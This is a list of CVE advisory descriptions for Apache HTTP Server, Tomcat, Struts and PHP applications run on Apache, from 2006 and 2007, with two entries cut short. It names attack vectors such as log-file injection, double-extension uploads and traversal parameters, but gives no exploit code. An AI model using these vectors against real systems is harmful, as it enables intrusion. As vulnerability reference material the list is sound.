| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
12759| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
12760| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
12761| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
12762| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
12763| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
12764| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
12765| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
12766| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
12767| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
12768| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
12769| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
12770| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
12771| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
12772| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
12773| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
12774| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
12775| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
12776| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
12777| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
12778| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
12779| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
12780| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
12781| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
12782| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
12783| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in Welcome web-app.
12784| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
12785| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
12786| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
12787| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
12788| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
12789| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
12790| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
12791| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
12792| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
12793| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
12794| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
12795| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
12796| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
12797| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
12798| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
12799| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
12800| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
12801| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
12802| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
12803| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
12804| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
12805| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
12806| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
12807| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
12808| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
12809| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
12810| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
12811| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
12812| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
12813| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
12814| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
12815| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
12816| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
12817| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
12818| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
12819| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
12820| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
12821| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
